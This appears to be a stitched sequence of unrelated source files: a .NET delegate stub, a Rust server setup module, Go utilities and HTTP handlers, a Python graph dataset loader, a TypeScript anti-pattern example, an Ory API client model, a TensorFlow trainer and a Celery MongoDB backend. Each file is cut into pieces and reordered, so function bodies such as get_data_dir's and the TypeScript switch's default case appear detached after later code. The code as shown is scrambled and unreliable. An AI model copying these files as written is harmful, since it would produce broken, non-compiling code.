GetMethodImpl(self: MulticastDelegate) -> MethodInfo
Returns a static method represented by the current System.MulticastDelegate.
Returns: A static method represented by the current System.MulticastDelegate.
"""
pass
def Invoke(self,sender,sbdevent):
""" Invoke(self: StatusBarDrawItemEventHandler,sender: object,sbdevent: StatusBarDrawItemEventArgs) """
pass
def RemoveImpl(self,*args):
"""
RemoveImpl(self: MulticastDelegate,value: Delegate) -> Delegate
Removes an element from the invocation list of this System.MulticastDelegate that is equal to the specified delegate.
value: The delegate to search for in the invocation list.
Returns: If value is found in the invocation list for this instance,then a new System.Delegate without value in its invocation list; otherwise,this instance with its original invocation list.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,object,method):
""" __new__(cls: type,object: object,method: IntPtr) """
pass
def __reduce_ex__(self,*args):
pass
| """
DynamicInvokeImpl(self: Delegate,args: Array[object]) -> object
Dynamically invokes (late-bound) the method represented by the current delegate.
args: An array of objects that are the arguments to pass to the method represented by the current delegate.-or- null,if the method represented by the current delegate does not require arguments.
Returns: The object returned by the method represented by the delegate.
"""
pass |
setup.rs | //! Utilities used during the initial setup
use crate::Pool;
use actix_web::middleware::Logger;
use blake2::{Blake2b, Digest};
use diesel::{
r2d2::{self, ConnectionManager},
sqlite::SqliteConnection,
};
use std::{env, path::PathBuf};
#[cfg(not(feature = "dev"))]
use dirs;
#[cfg(feature = "dev")]
use dotenv;
#[cfg(feature = "dev")]
use std::str::FromStr;
#[cfg(not(feature = "dev"))]
use std::{
fs,
io::{self, BufRead},
process,
};
#[cfg(not(feature = "dev"))]
use toml;
/// Returns a path to the directory storing application data
#[cfg(not(feature = "dev"))]
pub fn get_data_dir() -> PathBuf |
/// Returns a path to the directory storing application config
#[cfg(not(feature = "dev"))]
pub fn get_config_dir() -> PathBuf {
let base_dir = dirs::config_dir().expect("Unable to determine the config directory");
base_dir.join(env!("CARGO_PKG_NAME"))
}
/// Returns a path to the configuration file
#[cfg(not(feature = "dev"))]
fn get_config_path() -> PathBuf {
get_config_dir().join("config.toml")
}
/// Returns a path to the bearer token hash
#[cfg(not(feature = "dev"))]
pub fn get_password_path() -> PathBuf {
get_config_dir().join("passwd")
}
/// Returns the BLAKE2b digest of the input string
pub fn hash<T: AsRef<[u8]>>(input: T) -> Vec<u8> {
let mut hasher = Blake2b::new();
hasher.input(input);
hasher.result().to_vec()
}
/// Returns an environment variable, panicking if it isn't found
#[cfg(feature = "dev")]
#[macro_export]
macro_rules! get_env {
($k:literal) => {
        std::env::var($k).expect(&format!("Can't find {} environment variable", $k))
};
}
/// Returns a parsed environment variable, panicking if it isn't found or is not parsable
#[cfg(feature = "dev")]
macro_rules! parse_env {
($k:literal) => {
get_env!($k).parse().expect(&format!("Invalid {}", $k))
};
}
/// Application configuration
#[derive(Serialize, Deserialize, Clone)]
#[cfg_attr(not(feature = "dev"), serde(default))]
pub struct Config {
/// Port to listen on
pub port: u16,
/// SQLite database connection url
pub database_url: String,
/// SQLite database connection pool size
pub pool_size: u32,
/// Directory where to store static files
pub files_dir: PathBuf,
/// Maximum allowed file size
pub max_filesize: usize,
/// SSL Certificate private key location
pub cert_privkey: String,
/// SSL Certificate chain location
pub cert_chain: String,
/// Use SSL or not
pub use_ssl: bool,
}
#[cfg(not(feature = "dev"))]
impl Default for Config {
fn default() -> Self {
let port = 8080;
let database_url = {
let path = get_data_dir().join("database.db");
path.to_str()
.expect("Can't convert database path to string")
.to_owned()
};
let pool_size = std::cmp::max(1, num_cpus::get() as u32 / 2);
let files_dir = get_data_dir().join("files");
let max_filesize = 10_000_000;
let cert_privkey = "cert.pem".to_string();
let cert_chain = "chain.pem".to_string();
let use_ssl = false;
Config {
port,
database_url,
pool_size,
files_dir,
max_filesize,
cert_privkey,
cert_chain,
use_ssl,
}
}
}
impl Config {
/// Deserialize the config file
#[cfg(not(feature = "dev"))]
pub fn read_file() -> Result<Self, &'static str> {
let path = get_config_path();
let contents = if let Ok(contents) = fs::read_to_string(&path) {
contents
} else {
return Err("Can't read config file.");
};
let result = toml::from_str(&contents);
if result.is_err() {
return Err("Invalid config file.");
}
let mut result: Config = result.unwrap();
if result.files_dir.is_absolute() {
if fs::create_dir_all(&result.files_dir).is_err() {
return Err("Can't create files_dir.");
}
result.files_dir = match result.files_dir.canonicalize() {
Ok(path) => path,
Err(_) => return Err("Invalid files_dir."),
}
} else {
let files_dir = get_data_dir().join(&result.files_dir);
if fs::create_dir_all(&files_dir).is_err() {
return Err("Can't create files_dir.");
}
result.files_dir = match files_dir.canonicalize() {
Ok(path) => path,
Err(_) => return Err("Invalid files_dir."),
}
}
Ok(result)
}
/// Serialize the config file
#[cfg(not(feature = "dev"))]
pub fn write_file(&self) -> Result<(), &'static str> {
let path = get_config_path();
let contents = toml::to_string(&self).expect("Can't serialize config.");
match fs::write(&path, &contents) {
Ok(_) => Ok(()),
Err(_) => Err("Can't write config file."),
}
}
/// Creates a config from environment variables
#[cfg(feature = "dev")]
pub fn debug() -> Self {
dotenv::dotenv().ok();
let port = parse_env!("PORT");
let database_url = get_env!("DATABASE_URL");
let pool_size = parse_env!("POOL_SIZE");
let files_dir = {
let files_dir = get_env!("FILES_DIR");
let path = PathBuf::from_str(&files_dir).expect("Can't convert files dir to path");
if path.is_absolute() {
path.canonicalize().expect("Invalid FILES_DIR")
} else {
let cargo_manifest_dir = env!("CARGO_MANIFEST_DIR");
let mut cargo_manifest_dir = PathBuf::from_str(cargo_manifest_dir)
.expect("Can't convert cargo manifest dir to path");
cargo_manifest_dir.push(&path);
cargo_manifest_dir
.canonicalize()
.expect("Invalid FILES_DIR")
}
};
let max_filesize = parse_env!("MAX_FILESIZE");
let cert_privkey = parse_env!("CERTIFICATE");
let cert_chain = parse_env!("CERT_CHAIN");
let use_ssl = parse_env!("USE_SSL");
Config {
port,
database_url,
pool_size,
files_dir,
max_filesize,
cert_privkey,
cert_chain,
use_ssl,
}
}
}
/// Creates a SQLite database connection pool
pub fn create_pool(url: &str, size: u32) -> Pool {
let manager = ConnectionManager::<SqliteConnection>::new(url);
r2d2::Pool::builder()
.max_size(size)
.build(manager)
.expect("Can't create pool")
}
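// Illustrative usage (names taken from the `Config` struct above):
// let pool = create_pool(&config.database_url, config.pool_size);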
/// Initializes the logger
pub fn init_logger() {
if cfg!(feature = "dev") && env::var_os("RUST_LOG").is_none() {
env::set_var("RUST_LOG", "actix_web=debug");
} else if !cfg!(feature = "dev") {
env::set_var("RUST_LOG", "actix_web=info");
}
env_logger::init();
}
/// Returns the logger middleware
pub fn logger_middleware() -> Logger {
#[cfg(feature = "dev")]
{
dotenv::dotenv().ok();
if let Ok(format) = env::var("LOG_FORMAT") {
Logger::new(&format)
} else {
Logger::default()
}
}
#[cfg(not(feature = "dev"))]
{
Logger::default()
}
}
/// Performs the initial setup
#[cfg(not(feature = "dev"))]
pub fn init() -> Config {
fs::create_dir_all(get_config_dir()).unwrap_or_else(|e| {
eprintln!("Can't create config directory: {}.", e);
process::exit(1);
});
let password_path = get_password_path();
if !password_path.exists() {
let stdin = io::stdin();
let mut stdin = stdin.lock();
let mut password = String::new();
loop {
println!("Enter the password to use: ");
stdin.read_line(&mut password).unwrap_or_else(|e| {
eprintln!("Can't read password: {}", e);
process::exit(1);
});
password = password.replace("\r", "");
password = password.replace("\n", "");
if !password.is_empty() {
break;
}
println!("Are you sure you want to leave an empty password? This will disable authentication: [y/N]: ");
let mut answer = String::new();
stdin.read_line(&mut answer).unwrap_or_else(|e| {
eprintln!("Can't read answer: {}", e);
process::exit(1);
});
if answer.trim() == "y" {
break;
}
}
let password_hash = hash(&password);
fs::write(&password_path, password_hash.as_slice()).unwrap_or_else(|e| {
eprintln!("Can't write password: {}", e);
process::exit(1);
});
}
let config_path = get_config_path();
if !config_path.exists() {
println!("Generating config file at {}", config_path.display());
let config = Config::default();
config.write_file().unwrap_or_else(|e| {
eprintln!("Can't write config file: {}", e);
process::exit(1);
});
return config;
}
Config::read_file().unwrap_or_else(|e| {
eprintln!("{}", e);
process::exit(1);
})
}
| {
let base_dir = dirs::data_dir().expect("Unable to determine the data directory");
base_dir.join(env!("CARGO_PKG_NAME"))
} |
various.go | package genworldvoronoi
import (
"math"
"sort"
"github.com/Flokey82/go_gens/vectors"
)
// dist2 returns the euclidean distance between two points.
func dist2(a, b [2]float64) float64 {
	xDiff := a[0] - b[0]
	yDiff := a[1] - b[1]
	return math.Sqrt(xDiff*xDiff + yDiff*yDiff)
}
// min is the int equivalent of math.Min(a, b).
func min(a, b int) int |
// minMax returns the smallest and largest value in hm.
func minMax(hm []float64) (float64, float64) {
if len(hm) == 0 {
return 0, 0
}
min, max := hm[0], hm[0]
for _, h := range hm {
if h > max {
max = h
}
if h < min {
min = h
}
}
return min, max
}
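// convToMap converts a slice of ints into a set-like lookup map.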
func convToMap(in []int) map[int]bool {
res := make(map[int]bool)
for _, v := range in {
res[v] = true
}
return res
}
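// convToArray converts a set-like map back into a sorted slice of ints.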
func convToArray(in map[int]bool) []int {
var res []int
for v := range in {
res = append(res, v)
}
sort.Ints(res)
return res
}
// convToVec3 converts a float slice containing 3 values into a vectors.Vec3.
func convToVec3(xyz []float64) vectors.Vec3 {
return vectors.Vec3{xyz[0], xyz[1], xyz[2]}
}
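// degToRad converts an angle from degrees to radians.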
func degToRad(deg float64) float64 {
return deg * math.Pi / 180
}
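// radToDeg converts an angle from radians to degrees.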
func radToDeg(rad float64) float64 {
return rad * 180 / math.Pi
}
| {
if a < b {
return a
}
return b
} |
data_ingredient.py | from math import floor
import numpy as np
from .graph import load_edge_list, load_adjacency_matrix
from .graph_dataset import BatchedDataset
from ..config_loader import get_config
def load_dataset():
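    # Build the train and (optionally) eval BatchedDatasets described by
    # the data section of the global config.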
data_config = get_config().data
    if data_config.graph_data_type == "edge":
idx, objects, weights = load_edge_list(data_config.path, data_config.symmetrize,
delimiter=data_config.delimiter)
else:
idx, objects, weights = load_adjacency_matrix(data_config.path,
data_config.graph_data_format,
data_config.symmetrize)
# define a feature function
if data_config.object_id_to_feature_func == "conceptnet":
features = [' '.join(object_id.split('_')) for object_id in objects]
elif data_config.object_id_to_feature_func == "wordnet":
# placental_mammal.n.01 -> placental mammal
features = [' '.join(object_id.split('.')[0].split('_')) for object_id in objects]
elif data_config.object_id_to_feature_func == "id":
# xyz -> xyz
|
else:
features = None
    if data_config.make_eval_split:
np.random.seed(data_config.split_seed)
shuffle_order = np.arange(idx.shape[0])
np.random.shuffle(shuffle_order)
num_eval = floor(idx.shape[0] * data_config.split_size)
eval_indices = shuffle_order[:num_eval]
train_indices = shuffle_order[num_eval:]
train_idx = idx[train_indices]
train_weights = weights[train_indices]
eval_idx = idx[eval_indices]
eval_weights = weights[eval_indices]
train_data = BatchedDataset(
train_idx,
objects,
train_weights,
data_config.manifold,
data_config.n_graph_neighbors,
data_config.n_manifold_neighbors,
data_config.n_rand_neighbors,
data_config.batch_size,
data_config.num_workers,
data_config.nn_workers,
data_config.manifold_nn_k,
features,
saved_data_file=data_config.graph_data_file,
gen_data=data_config.gen_graph_data
)
eval_data = BatchedDataset.initialize_eval_dataset(
train_data,
            data_config.eval_batch_size,
data_config.n_eval_neighbors,
data_config.max_eval_graph_neighbors,
data_config.eval_workers,
data_config.eval_nn_workers,
manifold_neighbors=data_config.eval_manifold_neighbors,
eval_edges=eval_idx,
eval_weights=eval_weights)
return train_data, eval_data
else:
train_data = BatchedDataset(
idx,
objects,
weights,
            data_config.manifold,
data_config.n_graph_neighbors,
data_config.n_manifold_neighbors,
data_config.n_rand_neighbors,
data_config.batch_size,
data_config.num_workers,
data_config.nn_workers,
data_config.manifold_nn_k,
features,
saved_data_file=data_config.graph_data_file,
gen_data=data_config.gen_graph_data)
eval_data = BatchedDataset.initialize_eval_dataset(
train_data,
data_config.eval_batch_size,
data_config.n_eval_neighbors,
data_config.max_eval_graph_neighbors,
data_config.eval_workers,
data_config.eval_nn_workers,
manifold_neighbors=data_config.eval_manifold_neighbors,
saved_data_file=data_config.graph_data_file,
gen_data=data_config.gen_graph_data)
return train_data, eval_data
def get_adjacency_dict(data):
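    # Build an adjacency mapping of node -> set of neighbor nodes from the
    # dataset's edge index.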
adj = {}
for row in data.idx:
x = row[0]
y = row[1]
if x in adj:
adj[x].add(y)
else:
adj[x] = {y}
return adj
| features = [object_id for object_id in objects] |
algorithms_bad.ts | /* eslint-disable max-lines-per-function */
const myMeasureSystem = 'US';
const myCircle: Shape = { name: 'CIRCLE', radius: 5 };
const myArea = getArea(myCircle);
const myUnits = getUnitName(myMeasureSystem);
const areaDescription = `My ${myCircle.name} occupies an area of ${myArea} ${myUnits}`;
console.log(areaDescription);
type Shape = { name: string; base?: number; height?: number; width?: number; radius?: number };
// ❌ high cyclomatic complexity
export function getArea(shape: Shape): number {
const PI = 3.14;
const HALVE = 0.5;
let area: number;
  // ❌ switch cases don't scale well
switch (shape.name) {
case 'TRIANGLE':
area = shape.base * shape.height * HALVE;
break;
case 'SQUARE':
area = shape.height * shape.height;
break;
case 'RECTANGLE':
area = shape.height * shape.width;
break;
case 'CIRCLE':
area = PI * shape.radius * shape.radius;
break;
// ❌ more cases implies change the code | return area;
}
// 🚨 it seems a naive if condition, but...
export function getUnitName(measureSystem: string): string {
if (measureSystem === 'US') {
return 'square yards';
} else {
return 'square metres';
}
}
// ❌ there are duplicated logic
export function getUnitSymbol(measureSystem: string): string {
if (measureSystem === 'US') {
return 'yd2';
} else {
return 'm2';
}
}
// 🔥 and can need another else or a switch if there is another case | default:
throw new Error('shape not recognized');
} |
project_revisions.py | """
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.93
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from ory_client.exceptions import ApiAttributeError
def lazy_import():
from ory_client.model.project_revision import ProjectRevision
globals()['ProjectRevision'] = ProjectRevision
class ProjectRevisions(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
and for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'value': ([ProjectRevision],),
}
@cached_property
def discriminator():
return None
attribute_map = {}
read_only_vars = set()
_composed_schemas = None
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""ProjectRevisions - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] ([ProjectRevision]): # noqa: E501
Keyword Args:
value ([ProjectRevision]): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
) |
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
"""ProjectRevisions - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] ([ProjectRevision]): # noqa: E501
Keyword Args:
value ([ProjectRevision]): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
self = super(OpenApiModel, cls).__new__(cls)
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
return self | |
api_handlers.go | package main
import (
"encoding/json"
"log"
"net/http"
"github.com/gorilla/mux"
)
// getServer is the handler to get a specific server by name. it's called the same way
// as if the standard net/http library called it, except we're guaranteed that it's called
// only if the specific request format (laid out in gorilla_server.go) is met
func getServer(w http.ResponseWriter, r *http.Request) {
// mux.Vars gets a map of path variables by name. here "name" matches the {name} path
// variable as seen in gorilla_server.go
name, ok := mux.Vars(r)["name"]
if !ok |
mx.RLock()
defer mx.RUnlock()
server, ok := servers[name]
if !ok {
http.Error(w, "no such server", http.StatusNotFound)
return
}
if err := json.NewEncoder(w).Encode(server); err != nil {
log.Printf("[JSON Encoding Error] %s", err)
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
// reserveServer is the handler to reserve a specific server by name
func reserveServer(w http.ResponseWriter, r *http.Request) {
name, ok := mux.Vars(r)["name"]
if !ok {
http.Error(w, "name missing in URL path", http.StatusBadRequest)
return
}
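	// Take the write lock: this handler mutates the shared servers map.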
mx.Lock()
defer mx.Unlock()
server, ok := servers[name]
if !ok {
http.Error(w, "no such server", http.StatusNotFound)
return
}
server.Reserved = true
server.NumReservations++
if err := json.NewEncoder(w).Encode(server); err != nil {
log.Printf("[JSON Encoding Error] %s", err)
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
// releaseServer is the handler to release a specific server by name
func releaseServer(w http.ResponseWriter, r *http.Request) {
name, ok := mux.Vars(r)["name"]
if !ok {
http.Error(w, "name missing in URL path", http.StatusBadRequest)
return
}
mx.Lock()
defer mx.Unlock()
server, ok := servers[name]
if !ok {
http.Error(w, "no such server", http.StatusNotFound)
return
}
server.Reserved = false
if err := json.NewEncoder(w).Encode(server); err != nil {
log.Printf("[JSON Encoding Error] %s", err)
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
| {
http.Error(w, "name missing in URL path", http.StatusBadRequest)
return
} |
trainer.py | # Copyright (C) 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A function that trains a network on a dataset."""
from lottery_ticket.foundations import paths
from lottery_ticket.foundations import save_restore
import tensorflow as tf
def train(sess, dataset, model, optimizer_fn, training_len, output_dir,
**params):
"""Train a model on a dataset. | Training continues until training_len iterations or epochs have taken place.
Args:
sess: A tensorflow session
dataset: The dataset on which to train (a child of dataset_base.DatasetBase)
model: The model to train (a child of model_base.ModelBase)
optimizer_fn: A function that, when called, returns an instance of an
optimizer object to be used to optimize the network.
training_len: A tuple whose first value is the unit of measure
("epochs" or "iterations") and whose second value is the number of
units for which the network should be trained.
output_dir: The directory to which any output should be saved.
**params: Other parameters.
save_summaries is whether to save summary data.
save_network is whether to save the network before and after training.
test_interval is None if the test set should not be evaluated; otherwise,
frequency (in iterations) at which the test set should be run.
validate_interval is analogous to test_interval.
Returns:
A dictionary containing the weights before training and the weights after
training, as well as the trained model.
"""
# Create initial session parameters.
optimize = optimizer_fn().minimize(model.loss)
sess.run(tf.global_variables_initializer())
initial_weights = model.get_current_weights(sess)
train_handle = dataset.get_train_handle(sess)
test_handle = dataset.get_test_handle(sess)
validate_handle = dataset.get_validate_handle(sess)
# Optional operations to perform before training.
if params.get('save_summaries', False):
writer = tf.summary.FileWriter(paths.summaries(output_dir))
train_file = tf.gfile.GFile(paths.log(output_dir, 'train'), 'w')
test_file = tf.gfile.GFile(paths.log(output_dir, 'test'), 'w')
validate_file = tf.gfile.GFile(paths.log(output_dir, 'validate'), 'w')
if params.get('save_network', False):
save_restore.save_network(paths.initial(output_dir), initial_weights)
save_restore.save_network(paths.masks(output_dir), model.masks)
# Helper functions to collect and record summaries.
def record_summaries(iteration, records, fp):
"""Records summaries obtained from evaluating the network.
Args:
iteration: The current training iteration as an integer.
records: A list of records to be written.
fp: A file to which the records should be logged in an easier-to-parse
format than the tensorflow summary files.
"""
if params.get('save_summaries', False):
log = ['iteration', str(iteration)]
for record in records:
# Log to tensorflow summaries for tensorboard.
writer.add_summary(record, iteration)
# Log to text file for convenience.
summary_proto = tf.Summary()
summary_proto.ParseFromString(record)
value = summary_proto.value[0]
log += [value.tag, str(value.simple_value)]
fp.write(','.join(log) + '\n')
def collect_test_summaries(iteration):
if (params.get('save_summaries', False) and
'test_interval' in params and
iteration % params['test_interval'] == 0):
sess.run(dataset.test_initializer)
records = sess.run(model.test_summaries, {dataset.handle: test_handle})
record_summaries(iteration, records, test_file)
def collect_validate_summaries(iteration):
if (params.get('save_summaries', False) and
'validate_interval' in params and
iteration % params['validate_interval'] == 0):
sess.run(dataset.validate_initializer)
records = sess.run(model.validate_summaries,
{dataset.handle: validate_handle})
record_summaries(iteration, records, validate_file)
# Train for the specified number of epochs. This behavior is encapsulated
# in a function so that it is possible to break out of multiple loops
# simultaneously.
def training_loop():
"""The main training loop encapsulated in a function."""
iteration = 0
epoch = 0
last_train_acc = None
while True:
sess.run(dataset.train_initializer)
epoch += 1
# End training if we have passed the epoch limit.
if training_len[0] == 'epochs' and epoch > training_len[1]:
return last_train_acc
# One training epoch.
while True:
try:
iteration += 1
# End training if we have passed the iteration limit.
if training_len[0] == 'iterations' and iteration > training_len[1]:
return last_train_acc
# Train.
results = sess.run([optimize, model.accuracy] + model.train_summaries,
{dataset.handle: train_handle})
last_train_acc = results[1]
records = results[2:]
record_summaries(iteration, records, train_file)
# Collect test and validation data if applicable.
collect_test_summaries(iteration)
collect_validate_summaries(iteration)
# End of epoch handling.
except tf.errors.OutOfRangeError:
break
# Run the training loop.
final_train_acc = training_loop()
# Clean up.
if params.get('save_summaries', False):
train_file.close()
test_file.close()
validate_file.close()
# Retrieve the final weights of the model.
final_weights = model.get_current_weights(sess)
if params.get('save_network', False):
save_restore.save_network(paths.final(output_dir), final_weights)
return initial_weights, final_weights, final_train_acc | |
mongodb.py | # -*- coding: utf-8 -*-
"""MongoDB result store backend."""
from __future__ import absolute_import, unicode_literals
from datetime import datetime, timedelta
from kombu.exceptions import EncodeError
from kombu.utils.objects import cached_property
from kombu.utils.url import maybe_sanitize_url, urlparse
from celery import states
from celery.exceptions import ImproperlyConfigured
from celery.five import items, string_t
from .base import BaseBackend
try:
import pymongo
except ImportError: # pragma: no cover
pymongo = None # noqa
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
from pymongo.binary import Binary # noqa
from pymongo.errors import InvalidDocument # noqa
else: # pragma: no cover
Binary = None # noqa
class InvalidDocument(Exception): # noqa
pass
__all__ = ('MongoBackend',)
BINARY_CODECS = frozenset(['pickle', 'msgpack'])
class MongoBackend(BaseBackend):
"""MongoDB result backend.
Raises:
celery.exceptions.ImproperlyConfigured:
if module :pypi:`pymongo` is not available.
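    Example:
        # illustrative configuration; the URL and database name are placeholders
        app.conf.result_backend = 'mongodb://localhost:27017/celery'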
"""
mongo_host = None
host = 'localhost'
port = 27017
user = None
password = None
database_name = 'celery'
taskmeta_collection = 'celery_taskmeta'
groupmeta_collection = 'celery_groupmeta'
max_pool_size = 10
options = None
supports_autoexpire = False
_connection = None
def __init__(self, app=None, **kwargs):
self.options = {}
super(MongoBackend, self).__init__(app, **kwargs)
if not pymongo:
raise ImproperlyConfigured(
'You need to install the pymongo library to use the '
'MongoDB backend.')
# Set option defaults
for key, value in items(self._prepare_client_options()):
self.options.setdefault(key, value)
# update conf with mongo uri data, only if uri was given
if self.url:
self.url = self._ensure_mongodb_uri_compliance(self.url)
uri_data = pymongo.uri_parser.parse_uri(self.url)
# build the hosts list to create a mongo connection
hostslist = [
'{0}:{1}'.format(x[0], x[1]) for x in uri_data['nodelist']
]
self.user = uri_data['username']
self.password = uri_data['password']
self.mongo_host = hostslist
if uri_data['database']:
# if no database is provided in the uri, use default
self.database_name = uri_data['database']
self.options.update(uri_data['options'])
# update conf with specific settings
config = self.app.conf.get('mongodb_backend_settings')
if config is not None:
if not isinstance(config, dict):
raise ImproperlyConfigured(
'MongoDB backend settings should be grouped in a dict')
config = dict(config) # don't modify original
if 'host' in config or 'port' in config:
# these should take over uri conf
self.mongo_host = None
self.host = config.pop('host', self.host)
self.port = config.pop('port', self.port)
self.mongo_host = config.pop('mongo_host', self.mongo_host)
self.user = config.pop('user', self.user)
self.password = config.pop('password', self.password)
self.database_name = config.pop('database', self.database_name)
self.taskmeta_collection = config.pop(
'taskmeta_collection', self.taskmeta_collection,
)
self.groupmeta_collection = config.pop(
'groupmeta_collection', self.groupmeta_collection,
)
self.options.update(config.pop('options', {}))
self.options.update(config)
@staticmethod
def _ensure_mongodb_uri_compliance(url):
parsed_url = urlparse(url)
if not parsed_url.scheme.startswith('mongodb'):
url = 'mongodb+{}'.format(url)
if url == 'mongodb://':
url += 'localhost'
return url
def _prepare_client_options(self):
if pymongo.version_tuple >= (3,):
return {'maxPoolSize': self.max_pool_size}
else: # pragma: no cover
return {'max_pool_size': self.max_pool_size,
'auto_start_request': False}
def _get_connection(self):
"""Connect to the MongoDB server."""
if self._connection is None:
from pymongo import MongoClient
host = self.mongo_host
if not host:
# The first pymongo.Connection() argument (host) can be
# a list of ['host:port'] elements or a mongodb connection
# URI. If this is the case, don't use self.port
# but let pymongo get the port(s) from the URI instead.
# This enables the use of replica sets and sharding.
# See pymongo.Connection() for more info.
host = self.host
if isinstance(host, string_t) \
and not host.startswith('mongodb://'):
host = 'mongodb://{0}:{1}'.format(host, self.port)
# don't change self.options
conf = dict(self.options)
conf['host'] = host
if self.user:
conf['username'] = self.user
if self.password:
conf['password'] = self.password
